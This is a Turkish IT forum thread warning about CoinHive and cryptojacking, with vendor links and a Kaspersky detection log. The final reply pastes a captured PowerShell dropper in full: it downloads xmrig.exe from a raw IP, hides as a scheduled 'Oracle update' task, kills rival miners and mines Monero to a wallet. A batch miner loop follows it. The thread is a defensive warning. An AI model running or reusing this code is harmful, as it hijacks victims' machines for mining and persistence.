ÇözümPark'a hoş geldiniz. Oturum Aç | Üye Ol
 
Ana Sayfa Makale Video Forum Resimler Dosyalar Etkinlik Hizmetlerimiz Biz Kimiz

CoinHive / Cryptojacking Casus Yazılımlara Dikkat!

Son Mesajınız 01-25-2018, 18:24 Samet İleli tarafından gönderildi. 6 yanıt.
Mesajları Sırala: Önceki Sonraki
  •  01-16-2018, 14:28 524884

    CoinHive / Cryptojacking Casus Yazılımlara Dikkat!

    Fidyecilerin yeni yöntemi web tarayıcılara yüklenen ve sistemlere  bulaşan "cryptojacking" ve "CoinHive" adı verilen zararlı yazılımlardır. Bu yazılımlar kripto para birimlerini, bilginiz olmadan CPU kaynaklarınızı kullanarak çıkarmak için kullanılan yeni bir yöntemdir. 

    • Cryptominer araçları bilgisayarınıza zarar vermez ve diskinizde depolanmaz, bu nedenle kötü amaçlı yazılım olarak değerlendirilemezler. Bu yüzden %99 lara varan CPU güçlerini kullandıklarından can sıkıcı yazılım olarak tanımlanırlar.
    • CoinHive , Bitcoin madenciliği ile ilişkili bir Javascript aracıdır. 
    • Etkilenen sitelerin ele geçirildiği düşünülür ve bu sayfalar da masum kullanıcılara hizmet eder.

    Bu yöntem ile kazanılan tahmini gelirin ayda yaklaşık 12.000 $ olduğu iddia ediliyor.

     

    Ayrıntılar için;

    https://www.fortiguard.com/encyclopedia/virus/7513257

     

    https://blog.fortinet.com/2017/10/19/cryptojacking-digging-for-your-own-treasure

     

    https://www.kaspersky.com/blog/hidden-miners-botnet-threat/18488/

     

  •  01-16-2018, 16:44 524898 Cevap 524884

    Cevap : CoinHive / Cryptojacking Casus Yazılımlara Dikkat!

    Hocam bilgilendirme için kendi adıma teşekkür ederim.

  •  01-16-2018, 17:08 524902 Cevap 524884

    Cevap : CoinHive / Cryptojacking Casus Yazılımlara Dikkat!

     Aynı şekilde web sitelere de bulaşıyorlar, özellikle web sitesine bulaşması durumunda çok can sıkıcı oluyor zamanında hosting hizmeti veren taraf ile pek çok problem yaşadık, bu nedenlerden dolayı hem hostingi hem de web sitesini tamamen değiştirmek zorunda kalmıştık, pire için yorgan yakmak zorunda kaldık yani. Çeşitli çözümler çıkıyor yakın zamanda bu virüsde ciddi oranda düşüş yaşanır diye düşünüyorum, firmalar güncelleme, bilgilendirme yapmaya başladılar.

  •  01-17-2018, 8:18 524912 Cevap 524884

    Cevap : CoinHive / Cryptojacking Casus Yazılımlara Dikkat!

    Bilgilendirme için teşekkürler.


    Aziz KADAGAN
    CCA-V | MCTS | MCSA | MCSE
  •  01-18-2018, 13:52 524992 Cevap 524902

    Cevap : CoinHive / Cryptojacking Casus Yazılımlara Dikkat!

    Zafer ALTI:

     Aynı şekilde web sitelere de bulaşıyorlar, özellikle web sitesine bulaşması durumunda çok can sıkıcı oluyor zamanında hosting hizmeti veren taraf ile pek çok problem yaşadık, bu nedenlerden dolayı hem hostingi hem de web sitesini tamamen değiştirmek zorunda kalmıştık, pire için yorgan yakmak zorunda kaldık yani. Çeşitli çözümler çıkıyor yakın zamanda bu virüsde ciddi oranda düşüş yaşanır diye düşünüyorum, firmalar güncelleme, bilgilendirme yapmaya başladılar.

     

    Rica ederim arkdaşlar. Zafer Altı' nın dediği gibi Web sitelerine de bulaşıyor. Özellikle WP, Joomla gibi açık kaynak kodlu web sitelerinde dikkat edilmelidir, güncellemeleri ve pentestleri ihmal etmemek gerek.

  •  01-18-2018, 16:31 524998 Cevap 524992

    Cevap : CoinHive / Cryptojacking Casus Yazılımlara Dikkat!

    Kaspersky AV bu gün bir kullanıcıda yakalamış. İşin ilginci ben bu post'u ve AV'nin mailini hemen hemen aynı zamanlarda gördüm ve okudum ;-)).

    Sezgisel olarak bulmuş.

     

            Critical event: 18.01.2018 10:06:09:
    Event type:     Probably infected object detected
    Application\Name:     Internet Explorer
    Application\Path:     C:\Program Files (x86)\internet explorer\
    Application\Process ID:     1268
    User:     domain\username (Active user)
    Component:     File Anti-Virus
    Result\Description:     Detected
    Result\Type:     Trojan
    Result\Name:     HEUR:Trojan.Script.Generic
    Result\Threat level:     High
    Result\Precision:     Heuristic Analysis
    Object:     C:\Users\username\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\62Q201B4\coinhive.min[1].js
    Object\Type:     File
    Object\Path:     C:\Users\username\
    AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\62Q201B4\
    Object\Name:     coinhive.min[1].js
    Reason:     Local databases
    Database release date:     18.01.2018 04:24:00

  •  01-25-2018, 18:24 525332 Cevap 524884

    Cevap : CoinHive / Cryptojacking Casus Yazılımlara Dikkat!

    $ne = $MyInvocation.MyCommand.Path $nurl = "http://158.69.133.17:8220/xmrig.exe" $noutput = "$env:TMP\yam.exe" $vc = New-Object System.Net.WebClient $vc.DownloadFile($nurl,$noutput) copy $ne $HOME\SchTask.ps1 copy $env:TMP\yam.exe $env:TMP\xe.exe SchTasks.exe /Create /SC MINUTE /TN "Update service for Oracle productsa" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $HOME\SchTask1.ps1" /MO 6 /F SchTasks.exe /Delete /TN "Update service for Oracle products" /F SchTasks.exe /Delete /TN "Update service for Oracle products5" /F SchTasks.exe /Delete /TN "Update service for Oracle products1" /F SchTasks.exe /Delete /TN "Update service for Oracle products2" /F SchTasks.exe /Delete /TN "Update service for Oracle products3" /F SchTasks.exe /Delete /TN "Update service for Oracle products4" /F SchTasks.exe /Delete /TN "Update service for Oracle products7" /F SchTasks.exe /Delete /TN "Update service for Oracle products8" /F SchTasks.exe /Delete /TN "Update service for Oracle products0" /F while ($true) { if(!(Get-Process xe -ErrorAction SilentlyContinue)) { echo "Not running" cmd.exe /C taskkill /IM ddg.exe /f cmd.exe /C taskkill /IM yam.exe /f cmd.exe /C taskkill /IM miner.exe /f cmd.exe /C taskkill /IM xmrig.exe /f cmd.exe /C taskkill /IM nscpucnminer32.exe /f cmd.exe /C taskkill /IM 1e.exe /f cmd.exe /C taskkill /IM iie.exe /f cmd.exe /C taskkill /IM 3.exe /f cmd.exe /C taskkill /IM iee.exe /f cmd.exe /C taskkill /IM ie.exe /f cmd.exe /C taskkill /IM je.exe /f cmd.exe /C taskkill /IM ie.exe /f cmd.exe /C taskkill /IM iexplorer.exe /f cmd.exe /C $env:TMP\xe.exe --donate-level=1 -k -a cryptonight -o stratum+tcp://monerohash.com:5555 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x } else { echo "Running" } Start-Sleep 55 }

     

    http://158.69.133.17:8220/1.ps1 adrsinden üstteki scripti çekiyor benim yakaladığım kalın seçtiğim yer sanırım monero coin kazdığı havuzun pool hash ı 

    dikkat edilmesi gerekiyor açıkcası sunucu üzerindeki yumurtlamaya sebep olan .bat dosyasının içeriğide altta.

     

     

    @echo off :P1 Start /W rundll32.exe -c x -M stratum+tcp://47Q1iH2tQD52qB7G4RxFaS31JEF5wWEzt77Zqa22dwKFi4b84qkkaV7JGu3Yy6uHmwR1oeKFN7uMT54UUAnaUdnmBr6piKx:x@at02.supportxmr.com:443/xmr goto P1

RSS haberlerini XML olarak görüntüle